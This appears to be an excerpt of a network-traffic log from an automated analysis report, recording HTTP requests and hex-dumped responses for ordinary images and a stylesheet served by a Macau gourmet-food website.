                                                                                                                                                              Data Ascii: GIF89a 444TTT!NETSCAPE2.0!, H*\php"8G>D)R4CI\9p:s1_2`p`u<uSYk`Fhv6S>u+ryJ/QM.0@p_++/KY&]9Mr`ixr\vfjMO&*Z
                                                                                                                                                              Mar 13, 2023 05:26:55.979722977 CET3085OUTGET /images/loading.gif HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:26:56.185426950 CET3092INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 2767
                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:24 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "cac8ecf7a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:01 GMT
                                                                                                                                                              Data Raw: 47 49 46 38 39 61 20 00 20 00 f7 00 00 ff ff ff b3 b3 b3 fb fb fb d6 d6 d6 e1 e1 e1 f2 f2 f2 ba ba ba 81 81 81 34 34 34 01 01 01 1b 1b 1b c4 c4 c4 97 97 97 fd fd fd 54 54 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 05 0a 00 00 00 2c 00 00 00 00 20 00 20 00 00 08 fa 00 01 08 1c 48 90 e0 82 03 0b 0a 2a 5c c8 70 e0 81 87 05 09 14 68 a8 70 80 81 82 0f 0f 10 1c c0 91 22 c1 02 0f 03 10 cc 38 b0 00 c7 01 1e 47 3e 44 29 90 a4 c0 93 04 52 0e 34 f0 90 81 43 88 00 08 9c 94 49 90 c1 c3 8b 00 5c c2 e4 39 70 c0 01 9f 13 1f 3a c8 b9 73 a0 ce 01 31 5f 32 60 90 70 60 80 9f 0a 75 96 3c 09 75 e0 82 a9 53 59 1a ad da 90 6b c7 9e 60 a7 46 f5 68 76 ed c6 b4 36 53 3e 75 bb f0 2b 03 96 72 79 12 00 4a b4 2f 51 b3 1c 4d 2e 30 40 b8 70 5f c0 1c 0b 2b e6 2b f3 e4 02 98 03 06 2f f6 4b 59 26 5d 8a 97 19 ce f5 b8 39 a5 d9 89 0a 4d 72 e5 09 b8 60 69 cc 78 9f 72 5c ab ba eb cb cb aa 09 76 66 ea fa e5 6a 00 4d 4f 82 26 2a 5a ec
                                                                                                                                                              Data Ascii: GIF89a 444TTT!NETSCAPE2.0!, H*\php"8G>D)R4CI\9p:s1_2`p`u<uSYk`Fhv6S>u+ryJ/QM.0@p_++/KY&]9Mr`ixr\vfjMO&*Z
                                                                                                                                                              Mar 13, 2023 05:27:03.855846882 CET3274OUTGET /fenye.css HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/OurChocology.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:04.071198940 CET3278INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 3629
                                                                                                                                                              Content-Type: text/css
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:10:21 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "c6cf3a43a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:09 GMT
                                                                                                                                                              Data Raw: 42 4f 44 59 20 7b 20 53 43 52 4f 4c 4c 42 41 52 2d 46 41 43 45 2d 43 4f 4c 4f 52 3a 20 23 64 65 65 33 65 37 3b 20 46 4f 4e 54 2d 53 49 5a 45 3a 20 31 32 70 78 3b 20 53 43 52 4f 4c 4c 42 41 52 2d 48 49 47 48 4c 49 47 48 54 2d 43 4f 4c 4f 52 3a 20 23 66 66 66 66 66 66 3b 20 53 43 52 4f 4c 4c 42 41 52 2d 53 48 41 44 4f 57 2d 43 4f 4c 4f 52 3a 20 23 64 65 65 33 65 37 3b 20 43 4f 4c 4f 52 3a 20 23 30 30 30 30 30 30 3b 20 53 43 52 4f 4c 4c 42 41 52 2d 33 44 4c 49 47 48 54 2d 43 4f 4c 4f 52 3a 20 23 64 31 64 37 64 63 3b 20 53 43 52 4f 4c 4c 42 41 52 2d 41 52 52 4f 57 2d 43 4f 4c 4f 52 3a 20 23 30 30 36 36 39 39 3b 20 53 43 52 4f 4c 4c 42 41 52 2d 54 52 41 43 4b 2d 43 4f 4c 4f 52 3a 20 23 45 46 45 46 45 46 3b 20 46 4f 4e 54 2d 46 41 4d 49 4c 59 3a 20 41 72 69 61 6c 3b 20 53 43 52 4f 4c 4c 42 41 52 2d 44 41 52 4b 53 48 41 44 4f 57 2d 43 4f 4c 4f 52 3a 20 23 39 38 61 61 62 31 20 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 70 78 3b 7d 0d 0a 74 61 62 6c 65 7b 46 4f 4e 54 2d 53 49 5a 45 3a 20 31 32 70 78 3b 20 43 4f 4c 4f 52 3a 20 23 30 30 30 30 30 30 3b 20 46 4f 4e 54 2d 46 41 4d 49 4c 59 3a 20 41 72 69 61 6c 3b 7d 0d 0a 74 64 7b 46 4f 4e 54 2d 53 49 5a 45 3a 20 31 32 70 78 3b 20 43 4f 4c 4f 52 3a 20 23 30 30 30 30 30 30 3b 20 46 4f 4e 54 2d 46 41 4d 49 4c 59 3a 20 41 72 69 61 6c 3b 7d 0d 0a 70 7b 4d 41 52 47 49 4e 2d 4c 45 46 54 3a 30 70 78 3b 4d 41 52 47 49 4e 2d 54 4f 50 3a 35 70 78 3b 4d 41 52 47 49 4e 2d 52 49 47 48 54 3a 30 70 78 3b 4d 41 52 47 49 4e 2d 42 4f 54 54 4f 4d 3a 35 70 78 3b 7d 0d 0a 2e 74 62 73 65 70 20 7b 0d 0a 09 50 41 44 44 49 4e 47 2d 52 49 47 48 54 3a 20 33 70 78 3b 20 50 41 44 44 49 4e 47 2d 4c 45 46 54 3a 20 33 70 78 3b 20 46 4f 4e 54 3a 20 39 70 78 20 41 72 69 61 6c 3b 20 43 4f 4c 4f 52 3a 20 23 38 42 36 41 32 38 3b 20 54 45 58 54 2d 41 4c 49 47 4e 3a 20 63 65 6e 74 65 72 3b 0d 0a 7d 0d 0a 2e 73 69 74 65 62 61 72 66 79 20 7b 0d 0a 09 50 41 44 44 49 4e 47 2d 52 49 47 48 54 3a 20 30 70 78 3b 20 42 4f 52 44 45 52 2d 54 4f 50 3a 20 23 46 30 46 30 46 30 20 30 70 78 20 73 6f 6c 69 64 3b 20 50 41 44 44 49 4e 47 2d 4c 45 46 54 3a 20 30 70 78 3b 20 46 4f 4e 54 2d 53 49 5a 45 3a 20 31 31 70 78 3b 43 4f 4c 4f 52 3a 20 23 38 42 36 41 32 38 3b 20 42 41 43 4b 47 52 4f 55 4e 44 3a 20 23 66 66 66 3b 20 50 41 44 44 49 4e 47 2d 42 4f 54 54 4f 4d 3a 20 32 70 78 3b 20 50 41 44 44 49 4e 47 2d 54 4f 50 3a 20 32 70 78 3b 20 42 4f 52 44 45 52 2d 42 4f 54 54 4f 4d 3a 20 23 46 30 46 30 46 30 20 30 70 78 20 64 6f 74 74 65 64 3b 20 46 4f 4e 54 2d 46 41 4d 49 4c 59 3a 20 41 72 69 61 6c 3b 77 69 64 74 68 3a 31 30 30 25 3b 0d 0a 7d 0d 0a 2e 66 79 30 20 7b 0d 0a 09 42 4f 52 44 45 52 2d 52 49 47 48 54 3a 20 3b 20 50 41 44 44 49 4e 47 2d 52 49 47 48 54 3a 20 33 70 78 3b 20 42 4f 52 44 45 52 2d 54 4f 50 3a 20 3b 20 50 41 44 44 49 4e 47 2d 4c 45 46 54 3a 20 33 70 78 3b 20 42 41 43 4b 47 52 4f 55 4e 44 3a 20 3b 20 50 41 44 44 49 4e 47 2d 42 4f 54 54 4f 4d 3a 20 30 70 78 3b 20 42 4f 52 44 45 52 2d 4c 45 46 54 3a 20 3b 20 43 55
                                                                                                                                                              Data Ascii: BODY { SCROLLBAR-FACE-COLOR: #dee3e7; FONT-SIZE: 12px; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #dee3e7; COLOR: #000000; SCROLLBAR-3DLIGHT-COLOR: #d1d7dc; SCROLLBAR-ARROW-COLOR: #006699; SCROLLBAR-TRACK-COLOR: #EFEFEF; FONT-FAMILY: Arial; SCROLLBAR-DARKSHADOW-COLOR: #98aab1 ;margin-left:0px;margin-top:0px;margin-right:0px;margin-bottom:0px;}table{FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Arial;}td{FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Arial;}p{MARGIN-LEFT:0px;MARGIN-TOP:5px;MARGIN-RIGHT:0px;MARGIN-BOTTOM:5px;}.tbsep {PADDING-RIGHT: 3px; PADDING-LEFT: 3px; FONT: 9px Arial; COLOR: #8B6A28; TEXT-ALIGN: center;}.sitebarfy {PADDING-RIGHT: 0px; BORDER-TOP: #F0F0F0 0px solid; PADDING-LEFT: 0px; FONT-SIZE: 11px;COLOR: #8B6A28; BACKGROUND: #fff; PADDING-BOTTOM: 2px; PADDING-TOP: 2px; BORDER-BOTTOM: #F0F0F0 0px dotted; FONT-FAMILY: Arial;width:100%;}.fy0 {BORDER-RIGHT: ; PADDING-RIGHT: 3px; BORDER-TOP: ; PADDING-LEFT: 3px; BACKGROUND: ; PADDING-BOTTOM: 0px; BORDER-LEFT: ; CU
                                                                                                                                                              Mar 13, 2023 05:27:04.317361116 CET3286OUTGET /images/pic_chocology.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/OurChocology.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:04.548182964 CET3291INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 19266
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:26 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "a0808f9a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:10 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 01 34 00 c8 03 01 11 00 02 11 01 03 11 01 ff c4 00 b8 00 00 00 06 03 01 01 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 07 01 08 09 00 0a 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 10 00 01 03 03 02 04 03 05 04 07 07 01 03 0d 00 00 01 02 03 04 00 11 05 21 06 31 41 12 07 51 61 13 71 81 22 14 08 91 a1 32 15 b1 42 52 23 d3 95 17 c1 d1 62 33 24 16 57 f0 72 35 37 e1 f1 82 92 c2 93 a3 34 25 85 26 27 47 11 00 02 02 01 03 02 03 05 06 05 04 03 00 03 00 00 00 01 02 03 11 21 31 04 12 05 41 51 13 61 71 91 d1 22 81 a1 32 92 54 15 f0 b1 c1 14 06 e1 42 52 23 f1 33 93 62 44 16 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ab 3e b6 3e bd fb 9f dc 2e e2 6e 5d 83 da ed d9 90 d8 fd b1 da 59 17 f1 b1 a4 e0 e4 b9 0e 6e 65 e8 8b 53 4e ca 7e 53 2a 4b be 8a d6 15 e9 b4 95 04 94 74 a9 60 ab f0 92 aa 33 8f 4c 92 69 f8 3d 50 9e a6 81 2b bb 3d d4 59 2b 57 72 f7 5a 94 a2 4a 94 73 33 89 24 f1 24 fa d5 cf fd 8f b7 b7 97 c7 ab f2 47 e4 57 e9 43 c9 7c 0f 7f 55 fb a5 ff 00 24 ee 93 7e 1f fd 66 77 f1 a9 fe c7 db ff 00 4f 57 e4 8f c8 3d 28 79 2f 81 8f ea bf 74 ac 2f dc ad d5 fc e2 6f f1 a9 7e c7 db ff 00 4f 57 e4 8f c8 3d 28 79 2f 81 8f ea bf 74 b5 ff 00 f6 56 ea fe 71 3b f8 d4 7e c7 db ff 00 4f 57 e4 8f c8 3d 28 79 20 63 ba dd d2 3f ff 00 49 dd 5f ce 66 ff 00 1a 9f ec 5d bf f4 f5 7e 48 fc 83 d2 87 92 f8 06 0e eb 77 47 9f 72 77 48 ff 00 ef 13 7f 8d 47 ec 5d bf f4 f5 7e 48 fc 85 e9 43 c9 7c 0c 7f 55 bb a3 ff 00 24 6e af e7 13 7f 8d 47 ec 5d bf f4 f5 7e 48 fc 87 e9 43 c9 7c 0f 7f 55 bb a3 ff 00 24 6e 9f e7 13 bf 8d 47 ec 5d bf f4 f5 7e 48 fc 85 e9 43 c9 7c 0f 7f 55 bb a3 ff 00 24 ee 9f e7 13 7f 8d 47 ec 5d bf f4 f5 7e 48 fc 87 e9 43 c9 7c 01 0e eb 77 44 eb fd 48 dd 3e cf ce 26 f1 ff 00 df 51 fb 17 6f fd 3d 5f 92 3f 20 f4 a1 e4 be 00 93 dd 4e e8 9f ff 00 a4 ee 9f e7 13 bf 8d 47 ec 5d bf f4 f5 7e 48 fc 83 d2 87 92 f8 06 0e e9 f7 43 fe 47 dd 3f ce 26 ff 00 16 8f d8 bb 7f e9 ea fc 91 f9 07 a5 0f 25 f0 0e 1d d2 ee 7d bf f1 1f 74 7f 38 9b fc 6a 3f 62 ed ff 00 a7 ab f2 47 e4 2f 4a 1e 4b e0 64 f7 47 b9 e0 7f e2 3e e8 fe 71 37 f8 b4 7e c5 db ff 00 4f 57 e4 8f c8 7e 94 3c 97 c0 2d 5d d3 ee 80 d3 fa 8f ba 3f 9c 4d fe 35 2f d8 bb 7f e9 ea fc 91 f9 07 a5 0f 25 f0 13 2f ba dd d0 17 b7 72 37 4f b7 f3 89 bf c6 a3 f6 2e df fa 7a bf 24 7e 41 e9 43 c9 7c 04 ea ee bf 74 ff 00 e4 ad d5 fc e2 6f f1 a9 7e c7 db ff 00 4f 57 e4 8f c8 3d 28 79 2f 80 f5 80 de 9d e7 dc 73 5b 85 8d ee 16 ed 75 4b 50 0a 58 cc 4e 21 3f fc 6a 94 7b 07 02 4f 4e 3d 5f 92 3f 22 32 8d 71 59 69 7c 0e 83 f6 67 b5 9d c9 98 88 d2 77 06 f6
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed4!1AQaq"2BR#b3$Wr574%&'G!1AQaq"2TBR#3bD?>>.n]YneSN~S*Kt`3Li=P+=Y+WrZJs3$$GWC|U$~fwOW=(y/t/o~OW=(y/tVq;~OW=(y c?I_f]~HwGrwHG]~HC|U$nG]~HC|U$nG]~HC|U$G]~HC|wDH>&Qo=_? NG]~HCG?&%}t8j?bG/JKdG>q7~OW~<-]?M5/%/r7O.z$~AC|to~OW=(y/s[uKPXN!?j{ON=_?"2qYi|gw
                                                                                                                                                              Mar 13, 2023 05:27:04.772531986 CET3338OUTGET /images/pic_chocology.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:04.977436066 CET3361INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 19266
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:26 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "a0808f9a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:10 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 01 34 00 c8 03 01 11 00 02 11 01 03 11 01 ff c4 00 b8 00 00 00 06 03 01 01 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 07 01 08 09 00 0a 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 10 00 01 03 03 02 04 03 05 04 07 07 01 03 0d 00 00 01 02 03 04 00 11 05 21 06 31 41 12 07 51 61 13 71 81 22 14 08 91 a1 32 15 b1 42 52 23 d3 95 17 c1 d1 62 33 24 16 57 f0 72 35 37 e1 f1 82 92 c2 93 a3 34 25 85 26 27 47 11 00 02 02 01 03 02 03 05 06 05 04 03 00 03 00 00 00 01 02 03 11 21 31 04 12 05 41 51 13 61 71 91 d1 22 81 a1 32 92 54 15 f0 b1 c1 14 06 e1 42 52 23 f1 33 93 62 44 16 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ab 3e b6 3e bd fb 9f dc 2e e2 6e 5d 83 da ed d9 90 d8 fd b1 da 59 17 f1 b1 a4 e0 e4 b9 0e 6e 65 e8 8b 53 4e ca 7e 53 2a 4b be 8a d6 15 e9 b4 95 04 94 74 a9 60 ab f0 92 aa 33 8f 4c 92 69 f8 3d 50 9e a6 81 2b bb 3d d4 59 2b 57 72 f7 5a 94 a2 4a 94 73 33 89 24 f1 24 fa d5 cf fd 8f b7 b7 97 c7 ab f2 47 e4 57 e9 43 c9 7c 0f 7f 55 fb a5 ff 00 24 ee 93 7e 1f fd 66 77 f1 a9 fe c7 db ff 00 4f 57 e4 8f c8 3d 28 79 2f 81 8f ea bf 74 ac 2f dc ad d5 fc e2 6f f1 a9 7e c7 db ff 00 4f 57 e4 8f c8 3d 28 79 2f 81 8f ea bf 74 b5 ff 00 f6 56 ea fe 71 3b f8 d4 7e c7 db ff 00 4f 57 e4 8f c8 3d 28 79 20 63 ba dd d2 3f ff 00 49 dd 5f ce 66 ff 00 1a 9f ec 5d bf f4 f5 7e 48 fc 83 d2 87 92 f8 06 0e eb 77 47 9f 72 77 48 ff 00 ef 13 7f 8d 47 ec 5d bf f4 f5 7e 48 fc 85 e9 43 c9 7c 0c 7f 55 bb a3 ff 00 24 6e af e7 13 7f 8d 47 ec 5d bf f4 f5 7e 48 fc 87 e9 43 c9 7c 0f 7f 55 bb a3 ff 00 24 6e 9f e7 13 bf 8d 47 ec 5d bf f4 f5 7e 48 fc 85 e9 43 c9 7c 0f 7f 55 bb a3 ff 00 24 ee 9f e7 13 7f 8d 47 ec 5d bf f4 f5 7e 48 fc 87 e9 43 c9 7c 01 0e eb 77 44 eb fd 48 dd 3e cf ce 26 f1 ff 00 df 51 fb 17 6f fd 3d 5f 92 3f 20 f4 a1 e4 be 00 93 dd 4e e8 9f ff 00 a4 ee 9f e7 13 bf 8d 47 ec 5d bf f4 f5 7e 48 fc 83 d2 87 92 f8 06 0e e9 f7 43 fe 47 dd 3f ce 26 ff 00 16 8f d8 bb 7f e9 ea fc 91 f9 07 a5 0f 25 f0 0e 1d d2 ee 7d bf f1 1f 74 7f 38 9b fc 6a 3f 62 ed ff 00 a7 ab f2 47 e4 2f 4a 1e 4b e0 64 f7 47 b9 e0 7f e2 3e e8 fe 71 37 f8 b4 7e c5 db ff 00 4f 57 e4 8f c8 7e 94 3c 97 c0 2d 5d d3 ee 80 d3 fa 8f ba 3f 9c 4d fe 35 2f d8 bb 7f e9 ea fc 91 f9 07 a5 0f 25 f0 13 2f ba dd d0 17 b7 72 37 4f b7 f3 89 bf c6 a3 f6 2e df fa 7a bf 24 7e 41 e9 43 c9 7c 04 ea ee bf 74 ff 00 e4 ad d5 fc e2 6f f1 a9 7e c7 db ff 00 4f 57 e4 8f c8 3d 28 79 2f 80 f5 80 de 9d e7 dc 73 5b 85 8d ee 16 ed 75 4b 50 0a 58 cc 4e 21 3f fc 6a 94 7b 07 02 4f 4e 3d 5f 92 3f 22 32 8d 71 59 69 7c 0e 83 f6 67 b5 9d c9 98 88 d2 77 06 f6
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed4!1AQaq"2BR#b3$Wr574%&'G!1AQaq"2TBR#3bD?>>.n]YneSN~S*Kt`3Li=P+=Y+WrZJs3$$GWC|U$~fwOW=(y/t/o~OW=(y/tVq;~OW=(y c?I_f]~HwGrwHG]~HC|U$nG]~HC|U$nG]~HC|U$G]~HC|wDH>&Qo=_? NG]~HCG?&%}t8j?bG/JKdG>q7~OW~<-]?M5/%/r7O.z$~AC|to~OW=(y/s[uKPXN!?j{ON=_?"2qYi|gw
                                                                                                                                                              Mar 13, 2023 05:27:22.211596012 CET3449OUTGET /images/title_products.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/OurProducts.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:22.416261911 CET3454INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 2247
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:27 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "c03cc7f9a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:27 GMT
